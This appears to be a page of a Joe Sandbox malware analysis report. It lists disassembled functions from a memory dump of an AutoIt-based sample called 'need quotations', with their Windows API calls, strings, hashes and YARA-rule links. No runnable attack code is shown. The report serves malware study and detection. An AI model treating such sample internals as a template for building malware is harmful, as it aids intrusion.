Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 7c00e0e0aeb6b29bdd7d555ddac3a5e247efa7e0855409ec5528c33d41e6cd98
Instruction ID: f26520ac553e22279dd1bba084136c257b76d130cbbe066863dbff9a15590b9e
Opcode Fuzzy Hash: 7c00e0e0aeb6b29bdd7d555ddac3a5e247efa7e0855409ec5528c33d41e6cd98
Instruction Fuzzy Hash: 32218271620218AFCF14EFA4C886EAD77B8AF45740F004469F509AB186DB74EE65CFA1

Function 002A93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002A945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A9467

Strings

Combobox, xrefs: 002A9429

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2bab712e759b59cb08c5148d5b9d870d732c0abb991e687d72db8ebdc8382aa7
Instruction ID: ef95998b26d08f44bad3c063d283abc3ac0bf6ebb63c24a549964cfdbe8e8cb6
Opcode Fuzzy Hash: 2bab712e759b59cb08c5148d5b9d870d732c0abb991e687d72db8ebdc8382aa7
Instruction Fuzzy Hash: 1B11C871320109BFEF11DF55DC80EBB376EEB4A3A4F104125F91897290DA719CA28B60

Function 002ADA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetActiveWindow.USER32 ref: 002ADA7B
EnumChildWindows.USER32(?,002AD75F,00000000), ref: 002ADAF5

Strings

T1), xrefs: 002ADAFB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1)
API String ID: 3814560230-270254240
Opcode ID: eecaafd38b83c9b6931fa993a3807484cc36053e432cf4393b1458d4712b1692
Instruction ID: 7108dd5f2905d123c1f9a5d995e0d93045c25446a9836d2c246d4b2a9351043d
Opcode Fuzzy Hash: eecaafd38b83c9b6931fa993a3807484cc36053e432cf4393b1458d4712b1692
Instruction Fuzzy Hash: FC212C79215205DFC715DF28E860AA6B7E9EF5A320F250619FD6A873E0DB31A810CF60

Function 002A98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

GetWindowRect.USER32(00000000,?), ref: 002A9968
GetSysColor.USER32(00000012), ref: 002A9982

Strings

static, xrefs: 002A9945

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 74636916796ffed37de28a1f43188866090aa3485bfbf02bd5a2b262e0c78c40
Instruction ID: 50d34f8bd538a8104e7f53301c6086f221139f1f77b34fe398bd64904693c61c
Opcode Fuzzy Hash: 74636916796ffed37de28a1f43188866090aa3485bfbf02bd5a2b262e0c78c40
Instruction Fuzzy Hash: 7611267252020AAFDB14DFB8CC45EEA7BA8FF09344F014629FD55E2250EB35E861DB60

Function 002A9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002A9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002A96A8

Strings

edit, xrefs: 002A967D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: ab0d869845d02ef06e08df969d9c9ffa96e98e0f3e4968698ba9a89a3d80f859
Instruction ID: 8a0c6b7b3e3b39d308f43336d0cffc4c59c122615dfc5e20c327528e82bdb1ad
Opcode Fuzzy Hash: ab0d869845d02ef06e08df969d9c9ffa96e98e0f3e4968698ba9a89a3d80f859
Instruction Fuzzy Hash: 08119A71120109ABEB105F65EC44EEB3B6EEF067A8F104324FA64931E0CB719CA09B60

Function 00285262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002852D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002852F4

Strings

0, xrefs: 002852CE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: df081f6f4c3754daa139eaa16e95357d92b8df971b93ba55cea16226c8414097
Instruction ID: 244f1dd76b0f8ee9078ebd30d091bdb74041ff245db3df51e3d150c10ded9ca2
Opcode Fuzzy Hash: df081f6f4c3754daa139eaa16e95357d92b8df971b93ba55cea16226c8414097
Instruction Fuzzy Hash: 8E11227AD23625EBDB21EFA8D844B9E77B8AF05790F040061E801E72D4D7B0EE14CB91

Function 00294D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00294DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00294E1E

Strings

<local>, xrefs: 00294DE6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2aff14314276e46947ce4c9fa32c05684da8606df127e386a5fe51d040a85b33
Instruction ID: 6cfe2756a6c9fb5b09ba63c6c8e94544a1d08a6c4a7bdf7bc0983ef5d0c6c662
Opcode Fuzzy Hash: 2aff14314276e46947ce4c9fa32c05684da8606df127e386a5fe51d040a85b33
Instruction Fuzzy Hash: 6111A074521222BBDF259F51C888EFBFBA8FF06755F10822AF54556140D3B05966C6F0

Function 0026A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002737A7
___raise_securityfailure.LIBCMT ref: 0027388E

Strings

(0, xrefs: 00273889

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (0
API String ID: 3761405300-1516798123
Opcode ID: 6fcbdd458a01597af380318d501a577faa66f52d7f37a59af46f8410290f172b
Instruction ID: 0ca90e756967998a140fe18eea38258520c87d242b1f7ed11032ec38dc7c7174
Opcode Fuzzy Hash: 6fcbdd458a01597af380318d501a577faa66f52d7f37a59af46f8410290f172b
Instruction Fuzzy Hash: 7D2139F5512704CAD70ADF68F9A97407BF8BB48310F10982BE508A73A0E7F06990CF49

Function 0029A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E
htons.WSOCK32(00000000,?,00000000), ref: 0029A88B

Strings

255.255.255.255, xrefs: 0029A866

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 9cf286b44837187c3716c54b18f67afacba6512e3303542354ad322961c3f326
Instruction ID: c8a8b77eef172cb7d1678dd170cdeaab48a495eb2fa58a1ccaea2e8f0c4c061e
Opcode Fuzzy Hash: 9cf286b44837187c3716c54b18f67afacba6512e3303542354ad322961c3f326
Instruction Fuzzy Hash: BC01D275210305ABCB11AF68D88AFA9B364FF45314F20842AF5169B3D1D771E8258B92

Function 0027B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0027B7EF

Strings

ListBox, xrefs: 0027B7B9
ComboBox, xrefs: 0027B78B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 067de436d233ccc7a3ed7d1de819545f8e3e5fa291f54d55951715ea5e58912d
Instruction ID: c3f553ddd4ae4458e0de0a69aa69f191435a502870b66bbd89427da811287365
Opcode Fuzzy Hash: 067de436d233ccc7a3ed7d1de819545f8e3e5fa291f54d55951715ea5e58912d
Instruction Fuzzy Hash: 7F012471621118ABCB49EFA8CC52EFE7379BF06350B14461CF462672D2EFB058288B90

Function 0027B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 0027B6EB

Strings

ListBox, xrefs: 0027B6B5
ComboBox, xrefs: 0027B687

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 61757efb50a5838e4b98683efc58c42d0f7d572d9ba8618be9ce1dbcc02ea734
Instruction ID: 7a919fc50717517061976e6e69c0733a3e670e67f2989ca843b24601cb9ff9b2
Opcode Fuzzy Hash: 61757efb50a5838e4b98683efc58c42d0f7d572d9ba8618be9ce1dbcc02ea734
Instruction Fuzzy Hash: 47018871661008ABC749EB64C956BFE73AC9F06344B204029B60673291DBA05E288BA5

Function 0027B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 0027B76C

Strings

ListBox, xrefs: 0027B738
ComboBox, xrefs: 0027B70A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: d79ee11be989d8a58bb89db64ed5c36cbc63dd64bea5589614036b8e5878cfd2
Instruction ID: f45c08346b5369ff0721feddcdedeacadccb17837f16af5e5fadae85e37c78a3
Opcode Fuzzy Hash: d79ee11be989d8a58bb89db64ed5c36cbc63dd64bea5589614036b8e5878cfd2
Instruction Fuzzy Hash: CB01DB72661109ABC709EBA4D913FFEB3AC9F05344F604029B50573291DB705E398BB5

Function 00264D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00264D9E
__calloc_crt.LIBCMT ref: 00264DB7

Strings

"0, xrefs: 00264DCE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __calloc_crt
String ID: "0
API String ID: 3494438863-1700454928
Opcode ID: 53f92819f947edecae10230b75d951602e727777787a1d745a9e3a1ce96e8a5e
Instruction ID: 952266e9c01acdb21e4ecbb9a1b49de891336f47c6650f883736257532057a40
Opcode Fuzzy Hash: 53f92819f947edecae10230b75d951602e727777787a1d745a9e3a1ce96e8a5e
Instruction Fuzzy Hash: ABF0FC7163A702DAE756AF59BC5576767DCF704760F10092FF204CA184E770C8D18B94

Function 00244024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00240000,00000063,00000001,00000010,00000010,00000000), ref: 00244048
EnumResourceNamesW.KERNEL32(00000000,0000000E,002867E9,00000063,00000000,75C10280,?,?,00243EE1,?,?,000000FF), ref: 002B41B3

Strings

>$, xrefs: 00244028

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >$
API String ID: 1578290342-2583128880
Opcode ID: b8275dde0adbcc641adb58f4b47fb87082e8e6cd8041c72980bb48c9c731ee1c
Instruction ID: bc833155118820c545996b85d34eae67cde9c7cdd299ecd8ef2023766dee4b23
Opcode Fuzzy Hash: b8275dde0adbcc641adb58f4b47fb87082e8e6cd8041c72980bb48c9c731ee1c
Instruction Fuzzy Hash: C5F09031662315B7E2255F1ABC5AFD33BADE709BB5F10010BF614EA1D0D2F090908BA0

Function 00287744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00287762
_wcscmp.LIBCMT ref: 00287774

Strings

#32770, xrefs: 0028776E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 20288a4aaac63d9dd91b430b0ea7c00d69fb6bb0943e5d1b17ecf66fd6e353c7
Instruction ID: 3f7ee1fb7b08fc474732034ad975495e9d67b26f6780d25104b511f251ed92c1
Opcode Fuzzy Hash: 20288a4aaac63d9dd91b430b0ea7c00d69fb6bb0943e5d1b17ecf66fd6e353c7
Instruction Fuzzy Hash: 42E0D87B60432927D710EAA5EC49FD7FBACEB51760F10006AF905D3081D670E651CBD4

Function 0027A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0027A63F

Part of subcall function 002613F1: _doexit.LIBCMT ref: 002613FB

Strings

AutoIt, xrefs: 0027A633
Error allocating memory., xrefs: 0027A638

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 62cdb4a3a46338fa3860df21c147606970ef0d53a1cd90608e7b342de5de182e
Instruction ID: 25c4f56e7bfeca644e9fe9ba0bb8050891f3890a98faa89518c576a07464744a
Opcode Fuzzy Hash: 62cdb4a3a46338fa3860df21c147606970ef0d53a1cd90608e7b342de5de182e
Instruction Fuzzy Hash: 00D02B323E032833C2143AA83C0BFCC754C8B06BA5F140032BB4C965C249E3DDB041D9

Function 002BAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 002BACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002BAEBD

Strings

WIN_XPe, xrefs: 002BACD3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: c4b0b67973bdfd359ae0a38b35d3ec26b0cbd7b2bba5ad875e52c824bb6d0697
Instruction ID: 6c4c4c51d9a84aac7afe64852192b4b68dff74f7586ad46f0924063c8dd53d1c
Opcode Fuzzy Hash: c4b0b67973bdfd359ae0a38b35d3ec26b0cbd7b2bba5ad875e52c824bb6d0697
Instruction Fuzzy Hash: 05E03970C20149AFCB11DFA4D9489ECFBB8AB48341F148097E402B2160DBB04A94DF22

Function 002A8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002A86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002A86B5

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Strings

Shell_TrayWnd, xrefs: 002A869B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 379d7e8440c33bea41a7c7bd9cbbb4ad807386efe10707e8a74a95c9ee9da28e
Instruction ID: e818613115bd8702c5373997868e925715bffd0d5936a6907e081f74ccae5c0b
Opcode Fuzzy Hash: 379d7e8440c33bea41a7c7bd9cbbb4ad807386efe10707e8a74a95c9ee9da28e
Instruction Fuzzy Hash: 9BD02231394318B7E228B770BC4FFC6BA089B48B10F200824B309AA1C0C8F0E950CB10

Function 002A86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002A86E2
PostMessageW.USER32(00000000), ref: 002A86E9

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

Strings

Shell_TrayWnd, xrefs: 002A86DB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 22a6db5f1fd6e7e7a5f786c98170f259f63f129c9e99a49ce3edc79c248e88b9
Instruction ID: 2b4a3441d31b9303331084c2a23161f685f3aefeac45477e6463362a23cdb9fc
Opcode Fuzzy Hash: 22a6db5f1fd6e7e7a5f786c98170f259f63f129c9e99a49ce3edc79c248e88b9
Instruction Fuzzy Hash: 65D022313813187BF228B770BC4FFC6BA089B48B10F600824B305EA1C0C8F0E950CB14

